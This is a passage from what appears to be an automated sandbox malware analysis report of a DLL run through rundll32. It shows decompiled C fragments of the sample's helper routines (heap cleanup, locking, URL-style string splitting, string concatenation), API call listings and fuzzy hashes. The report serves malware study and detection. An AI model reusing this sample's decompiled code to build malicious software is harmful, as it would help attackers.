                                            • Sleep.KERNEL32(0000000A), ref: 0580CDD2
                                            • HeapFree.KERNEL32(00000000,?), ref: 0580CDFA
                                            • RtlLeaveCriticalSection.NTDLL(05D7C2D0), ref: 0580CE18
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                            • String ID:
                                            • API String ID: 58946197-0
                                            • Opcode ID: 74d5407b9a1927aabf3cebbfb6757b9a29134300de4988042a7d508f64a654a1
                                            • Instruction ID: e0c5d5190184bc379e456c8b9023984998dfda3af9f650fd3ff07443dc2ea456
                                            • Opcode Fuzzy Hash: 74d5407b9a1927aabf3cebbfb6757b9a29134300de4988042a7d508f64a654a1
                                            • Instruction Fuzzy Hash: 11F03A71654241ABEB709FA8DC4AF167FA5AB10600F14D810FD46C62E1CA30FCD4CB6A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F5976 Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E049F5976() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x49fa30c; // 0x2cc
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x49fa35c; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x49fa30c; // 0x2cc
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x49fa2d8; // 0x4b80000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                            0x049f5976
                                            0x049f597d
                                            0x049f59c7
                                            0x049f59c9
                                            0x049f59c9
                                            0x049f5981
                                            0x049f5987
                                            0x049f598c
                                            0x049f5990
                                            0x049f5996
                                            0x049f599d
                                            0x00000000
                                            0x00000000
                                            0x049f599f
                                            0x049f59a4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f59a4
                                            0x049f59a6
                                            0x049f59ae
                                            0x049f59b1
                                            0x049f59b1
                                            0x049f59b7
                                            0x049f59be
                                            0x049f59c1
                                            0x049f59c1
                                            0x00000000

                                            APIs
                                            • SetEvent.KERNEL32(000002CC,00000001,049F3DC4), ref: 049F5981
                                            • SleepEx.KERNEL32(00000064,00000001), ref: 049F5990
                                            • CloseHandle.KERNEL32(000002CC), ref: 049F59B1
                                            • HeapDestroy.KERNEL32(04B80000), ref: 049F59C1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: CloseDestroyEventHandleHeapSleep
                                            • String ID:
                                            • API String ID: 4109453060-0
                                            • Opcode ID: db7f9aeb1396c4a4d18e19afcc14e3e15fc13b8435d82aae6d1a11c783397ac8
                                            • Instruction ID: 7dd52204b3035d76b3fe16b49f38f0c65de9c65b952215d242cd3a91f6dd0ef8
                                            • Opcode Fuzzy Hash: db7f9aeb1396c4a4d18e19afcc14e3e15fc13b8435d82aae6d1a11c783397ac8
                                            • Instruction Fuzzy Hash: 70F01CB5B05312ABDB185B359C4CF663FDCEB04775B494130FD04D7A86CB68EC808A60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F3F7E Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 37%
                                            			E049F3F7E() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x49fa3cc; // 0x4f795b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x49fa3cc; // 0x4f795b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x49fa3cc; // 0x4f795b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x49fb81a) {
					HeapFree( *0x49fa2d8, 0, _t10);
					_t7 =  *0x49fa3cc; // 0x4f795b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                            0x049f3f7e
                                            0x049f3f87
                                            0x049f3f97
                                            0x049f3f97
                                            0x049f3f9c
                                            0x049f3fa1
                                            0x00000000
                                            0x00000000
                                            0x049f3f91
                                            0x049f3f91
                                            0x049f3fa3
                                            0x049f3fa8
                                            0x049f3fac
                                            0x049f3fbf
                                            0x049f3fc5
                                            0x049f3fc5
                                            0x049f3fce
                                            0x049f3fd0
                                            0x049f3fd4
                                            0x049f3fda

                                            APIs
                                            • RtlEnterCriticalSection.NTDLL(04F79570), ref: 049F3F87
                                            • Sleep.KERNEL32(0000000A), ref: 049F3F91
                                            • HeapFree.KERNEL32(00000000), ref: 049F3FBF
                                            • RtlLeaveCriticalSection.NTDLL(04F79570), ref: 049F3FD4
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                            • String ID:
                                            • API String ID: 58946197-0
                                            • Opcode ID: c652b8be6e3073807018505488a79819d32a4f473c214f118c404048097f295d
                                            • Instruction ID: 6cf23b4c6db9d73e32c0fcb76b1a653a8d8aa6c95d513a8296839fe824ba695d
                                            • Opcode Fuzzy Hash: c652b8be6e3073807018505488a79819d32a4f473c214f118c404048097f295d
                                            • Instruction Fuzzy Hash: D7F062B43492029FEB289F64ED49B257BF5EB84741B095039EE06D7290C67CBC50DB15
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05812993 Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlEnterCriticalSection.NTDLL(05D7C2D0), ref: 0581299C
                                            • Sleep.KERNEL32(0000000A), ref: 058129A6
                                            • HeapFree.KERNEL32(00000000), ref: 058129D4
                                            • RtlLeaveCriticalSection.NTDLL(05D7C2D0), ref: 058129E9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                            • String ID:
                                            • API String ID: 58946197-0
                                            • Opcode ID: aa489251de129f1ae6e62ece7f9b5c2350ab9b9f1d9dc8cc680a87ab26ace675
                                            • Instruction ID: 8251b8c84e45c5f39dc4816ef2cf28fcca592b9bbf840d9a732b19c0ee895baf
                                            • Opcode Fuzzy Hash: aa489251de129f1ae6e62ece7f9b5c2350ab9b9f1d9dc8cc680a87ab26ace675
                                            • Instruction Fuzzy Hash: 91F0B7782242419FEB289B59E88BE267FA5AB44701B45D415FC03C72A0CE30BC94CB2A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580CF88 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.NTDLL ref: 0580D252
                                              • Part of subcall function 058146C8: GetModuleHandleA.KERNEL32(?,00000020,?,00008664,00001003,?,?,?,0580D0A2,?,?,?,00000000,00000000), ref: 058146ED
                                              • Part of subcall function 058146C8: GetProcAddress.KERNEL32(00000000,?), ref: 0581470F
                                              • Part of subcall function 058146C8: GetProcAddress.KERNEL32(00000000,?), ref: 05814725
                                              • Part of subcall function 058146C8: GetProcAddress.KERNEL32(00000000,?), ref: 0581473B
                                              • Part of subcall function 058146C8: GetProcAddress.KERNEL32(00000000,?), ref: 05814751
                                              • Part of subcall function 058146C8: GetProcAddress.KERNEL32(00000000,?), ref: 05814767
                                              • Part of subcall function 0580C000: memcpy.NTDLL(?,?,00000000,?,?,00001003,0581A412,0581A412,?,?,?,00000000,00000000), ref: 0580C074
                                              • Part of subcall function 0580C000: memcpy.NTDLL(00000000,?,?), ref: 0580C0DB
                                            • memcpy.NTDLL(?,?,00000004,?,?,0581A412,0581A412,0581A412,?,?,?,00000000,00000000), ref: 0580D101
                                              • Part of subcall function 0580A5C0: GetModuleHandleA.KERNEL32(?,?,?,0580D1BF,?,?,00000000,00000000), ref: 0580A5FE
                                              • Part of subcall function 0580A5C0: memcpy.NTDLL(?,0582932C,00000018,?,?,?), ref: 0580A67A
                                            • memcpy.NTDLL(?,?,00000018,?,?,0581A412,0581A412,0581A412,?,?,?,00000000,00000000), ref: 0580D14F
                                            • memcpy.NTDLL(?,05803BC6,00000800,?,?,00000000,00000000), ref: 0580D1D2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memcpy$AddressProc$HandleModule$memset
                                            • String ID:
                                            • API String ID: 1554640953-0
                                            • Opcode ID: bcefeb7fe37fb426838ea4d1cec3a23610ebdddca172a025f17c4f1721b1e0bf
                                            • Instruction ID: e04bf242ee49a9fe1e6d3f7b78aab3286404e5bb040165bb92d9c752d5152523
                                            • Opcode Fuzzy Hash: bcefeb7fe37fb426838ea4d1cec3a23610ebdddca172a025f17c4f1721b1e0bf
                                            • Instruction Fuzzy Hash: 70A148B1A0120AEFDB50DF98CC84AAEBBB5BF04304F145569EC11E7291D770EE85CB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05820232 Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.NTDLL ref: 0582028E
                                            • CloseHandle.KERNEL32(?,?,00000100,?,00000000,?,0580B047,00000000), ref: 058202DC
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000094,00000000,05821C4A,00000000,0580B047,05816749,00000000,0580B047,058130E3,00000000,0580B047,0581105E,00000000), ref: 058205E7
                                            • GetLastError.KERNEL32(?,00000000,?), ref: 058208E9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseErrorFreeHandleHeapLastmemset
                                            • String ID:
                                            • API String ID: 2333114656-0
                                            • Opcode ID: 20c059412410ff39a23ba77c6b34b999062a84b734ac5d1a356a1d1bbd7ad98f
                                            • Instruction ID: 04664192825527201a322c996427beea99d3d4aa1025c24d11dbb891e9bdce33
                                            • Opcode Fuzzy Hash: 20c059412410ff39a23ba77c6b34b999062a84b734ac5d1a356a1d1bbd7ad98f
                                            • Instruction Fuzzy Hash: A251C335704328FEDB11AE689C4EFAF3E6EAB44314F004026BD16E6590DAB08DD197A7
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580A3BD Relevance: 5.1, APIs: 4, Instructions: 110COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.NTDLL ref: 0580A3E3
                                            • memcpy.NTDLL ref: 0580A40B
                                              • Part of subcall function 0581AD9E: RtlNtStatusToDosError.NTDLL(00000000), ref: 0581ADD6
                                              • Part of subcall function 0581AD9E: SetLastError.KERNEL32(00000000), ref: 0581ADDD
                                            • GetLastError.KERNEL32(00000010,00000218,0582327D,00000100,?,00000318,00000008), ref: 0580A422
                                            • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,0582327D,00000100), ref: 0580A505
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Error$Last$Statusmemcpymemset
                                            • String ID:
                                            • API String ID: 1706616652-0
                                            • Opcode ID: 271bc24b1313642ee320545c22605c617011446c77848da98c24aa35996e5f3f
                                            • Instruction ID: 8f1e5c61953ea4b371cac3b38bfd9efaec5c315cfcf572be75891be25eaebae6
                                            • Opcode Fuzzy Hash: 271bc24b1313642ee320545c22605c617011446c77848da98c24aa35996e5f3f
                                            • Instruction Fuzzy Hash: F04151B1604701AFD764DF68CC45FAABBE9FB48310F00892DF999C6290EB30D9548B66
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05801000 Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 05816378: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,05801036,?,?,?,?), ref: 0581639C
                                              • Part of subcall function 05816378: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 058163AE
                                              • Part of subcall function 05816378: wcstombs.NTDLL ref: 058163BC
                                              • Part of subcall function 05816378: lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,05801036,?,?,?), ref: 058163E0
                                              • Part of subcall function 05816378: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 058163F5
                                              • Part of subcall function 05816378: mbstowcs.NTDLL ref: 05816402
                                              • Part of subcall function 05816378: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,05801036,?,?,?,?,?), ref: 05816414
                                              • Part of subcall function 05816378: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,05801036,?,?,?,?,?), ref: 0581642E
                                            • GetLastError.KERNEL32 ref: 0580109F
                                              • Part of subcall function 0580582E: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 058058DC
                                              • Part of subcall function 0580582E: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 05805900
                                              • Part of subcall function 0580582E: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,05801087,?,?,?,?,?,?,?), ref: 0580590E
                                            • HeapFree.KERNEL32(00000000,?), ref: 058010BB
                                            • HeapFree.KERNEL32(00000000,?), ref: 058010CC
                                            • SetLastError.KERNEL32(00000000), ref: 058010CF
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
                                            • String ID:
                                            • API String ID: 3867366388-0
                                            • Opcode ID: 8178e4bfe6a3d917dd8789a2c0c3f174e20b29d0e2b48df0c7e3c7b7ca57d96b
                                            • Instruction ID: 7e96964bad9d2f86804a047dd5c07c55d793bc36f3b267ba46cc30462653b931
                                            • Opcode Fuzzy Hash: 8178e4bfe6a3d917dd8789a2c0c3f174e20b29d0e2b48df0c7e3c7b7ca57d96b
                                            • Instruction Fuzzy Hash: DA311436900218ABCF529FA9DC8989EBFB5FB49320B108156FD56E2160D7319EA0DF91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581DA6D Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0581B4CF: lstrlen.KERNEL32(00000000,?,?,00000000,773C4620,?,00000001,00000001,?,058163D9,?,?,?,?,?,00000000), ref: 0581B529
                                              • Part of subcall function 0581B4CF: lstrlen.KERNEL32(?,?,?,00000000,773C4620,?,00000001,00000001,?,058163D9,?,?,?,?,?,00000000), ref: 0581B547
                                              • Part of subcall function 0581B4CF: RtlAllocateHeap.NTDLL(00000000,76C86985,?), ref: 0581B573
                                              • Part of subcall function 0581B4CF: memcpy.NTDLL(00000000,00000000,00000000,?,00000001,00000001,?,058163D9,?,?,?,?,?,00000000), ref: 0581B58A
                                              • Part of subcall function 0581B4CF: HeapFree.KERNEL32(00000000,00000000), ref: 0581B59D
                                              • Part of subcall function 0581B4CF: memcpy.NTDLL(00000000,?,?,?,00000001,00000001,?,058163D9,?,?,?,?,?,00000000), ref: 0581B5AC
                                            • GetLastError.KERNEL32 ref: 0581DB0C
                                              • Part of subcall function 0580582E: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 058058DC
                                              • Part of subcall function 0580582E: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 05805900
                                              • Part of subcall function 0580582E: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,05801087,?,?,?,?,?,?,?), ref: 0580590E
                                            • HeapFree.KERNEL32(00000000,?), ref: 0581DB28
                                            • HeapFree.KERNEL32(00000000,?), ref: 0581DB39
                                            • SetLastError.KERNEL32(00000000), ref: 0581DB3C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                                            • String ID:
                                            • API String ID: 2451549186-0
                                            • Opcode ID: 9a97d926e2b0d8154f3518d8558e38740c5e15bcefd45195ac4052e49e2fcc0d
                                            • Instruction ID: 5c320cbf9fe09027598a7c8bf76792213d1d52d60154d3ef46dbfb90c10986be
                                            • Opcode Fuzzy Hash: 9a97d926e2b0d8154f3518d8558e38740c5e15bcefd45195ac4052e49e2fcc0d
                                            • Instruction Fuzzy Hash: FC312632904108AFCF129F99DC458DEBFB9FB48320B148156FD16E2160D7719EA1DFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058094E8 Relevance: 5.1, APIs: 4, Instructions: 76COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memset
                                            • String ID:
                                            • API String ID: 2221118986-0
                                            • Opcode ID: 365ed3c44d09d3b8590d9528ce047255c305d10b26e89a4b5932b1dfbd2271c4
                                            • Instruction ID: 6885f1b9ccb64a3cfacb081753594069f589e1d280bd038ed12d96e1699b45fe
                                            • Opcode Fuzzy Hash: 365ed3c44d09d3b8590d9528ce047255c305d10b26e89a4b5932b1dfbd2271c4
                                            • Instruction Fuzzy Hash: 6A218BB2600A09BBDB609F62DC84966BB39FF09310B041518ED46D6892D332EDB1CBD5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F5296 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E049F5296(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E049F4DF6(_t2);
				if(_t34 != 0) {
					_t30 = E049F4DF6(_t28);
					if(_t30 == 0) {
						E049F4C73(_t34);
					} else {
						_t39 = _a4;
						_t22 = E049F79D7(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E049F79D7(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                            0x049f5296
                                            0x049f52a0
                                            0x049f52a2
                                            0x049f52a8
                                            0x049f52a8
                                            0x049f52b1
                                            0x049f52b5
                                            0x049f52c1
                                            0x049f52c5
                                            0x049f5339
                                            0x049f52c7
                                            0x049f52c7
                                            0x049f52cb
                                            0x049f52d0
                                            0x049f52d5
                                            0x049f52ef
                                            0x049f52de
                                            0x049f52de
                                            0x049f52e2
                                            0x049f52e5
                                            0x049f52ea
                                            0x049f52ea
                                            0x049f52f4
                                            0x049f531c
                                            0x049f5322
                                            0x049f5325
                                            0x049f52f6
                                            0x049f52f8
                                            0x049f5300
                                            0x049f530b
                                            0x049f5310
                                            0x049f5310
                                            0x049f532c
                                            0x049f5333
                                            0x049f5334
                                            0x049f5334
                                            0x049f52c5
                                            0x049f5344

                                            APIs
                                            • lstrlen.KERNEL32(00000000,00000008,?,76C84D40,?,?,049F4BF5,?,?,?,?,00000102,049F5388,?,?,00000000), ref: 049F52A2
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                              • Part of subcall function 049F79D7: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,049F52D0,00000000,00000001,00000001,?,?,049F4BF5,?,?,?,?,00000102), ref: 049F79E5
                                              • Part of subcall function 049F79D7: StrChrA.SHLWAPI(?,0000003F,?,?,049F4BF5,?,?,?,?,00000102,049F5388,?,?,00000000,00000000), ref: 049F79EF
                                            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,049F4BF5,?,?,?,?,00000102,049F5388,?), ref: 049F5300
                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 049F5310
                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 049F531C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                            • String ID:
                                            • API String ID: 3767559652-0
                                            • Opcode ID: 20c73ad3deee1d3e7d7c9a159416de12cf153bf7d524e2b5cd6cc55a53bb1256
                                            • Instruction ID: d63f8ea23ed01a915a6579232f18f70abef7905852d2b28db791a9953aacc231
                                            • Opcode Fuzzy Hash: 20c73ad3deee1d3e7d7c9a159416de12cf153bf7d524e2b5cd6cc55a53bb1256
                                            • Instruction Fuzzy Hash: 1621C072504259FBCB125FB8CC44A9F7FA9AF563A4B464070FA059B202E774E900C7A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580F123 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0581C0A9,00000000,00000000,00000004,00000000,?,0581A6B6,?,?,00000000), ref: 0580F12F
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                              • Part of subcall function 058227EB: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,0580F15D,00000000,00000001,00000001,?,?,0581C0A9,00000000,00000000,00000004,00000000), ref: 058227F9
                                              • Part of subcall function 058227EB: StrChrA.SHLWAPI(?,0000003F,?,?,0581C0A9,00000000,00000000,00000004,00000000,?,0581A6B6,?,?,00000000,0580D3E9,?), ref: 05822803
                                            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0581C0A9,00000000,00000000,00000004,00000000,?,0581A6B6,?), ref: 0580F18D
                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0580F19D
                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0580F1A9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                            • String ID:
                                            • API String ID: 3767559652-0
                                            • Opcode ID: 5a1079de321fd9538af6e9912bb4877b2df028d6aa2efa33d6078ecf94e651bc
                                            • Instruction ID: b9bb205708af2e328d9d91c2e337cc67c2d42872d7139f906c0276d10a057f72
                                            • Opcode Fuzzy Hash: 5a1079de321fd9538af6e9912bb4877b2df028d6aa2efa33d6078ecf94e651bc
                                            • Instruction Fuzzy Hash: 9621A276608315ABCB62AF68CC48A9A7FFDAF46280B059055FE06DB251DA31DD40CBB1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581A5AD Relevance: 5.1, APIs: 4, Instructions: 64COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memset
                                            • String ID:
                                            • API String ID: 2221118986-0
                                            • Opcode ID: 280e02b369eb955c104324183c048bd4a622080a89de0441f21e1e2b9aab48cb
                                            • Instruction ID: 47113f3e2e6ce6182ab5a9fc2ca1e1b22f17018dc19385df8fdfd5562163e552
                                            • Opcode Fuzzy Hash: 280e02b369eb955c104324183c048bd4a622080a89de0441f21e1e2b9aab48cb
                                            • Instruction Fuzzy Hash: A41191B2601609BBC7149FA0DC44E66773DFF09310F040119ED89D9850E772F9B29BD9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F6203 Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E049F6203(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E049F4DF6(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                            0x049f6218
                                            0x049f621c
                                            0x049f6226
                                            0x049f622b
                                            0x049f6230
                                            0x049f6232
                                            0x049f623a
                                            0x049f623f
                                            0x049f624d
                                            0x049f6252
                                            0x049f625c

                                            APIs
                                            • lstrlenW.KERNEL32(004F0053,?,76C85520,00000008,04F793CC,?,049F6861,004F0053,04F793CC,?,?,?,?,?,?,049F6BB4), ref: 049F6213
                                            • lstrlenW.KERNEL32(049F6861,?,049F6861,004F0053,04F793CC,?,?,?,?,?,?,049F6BB4), ref: 049F621A
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
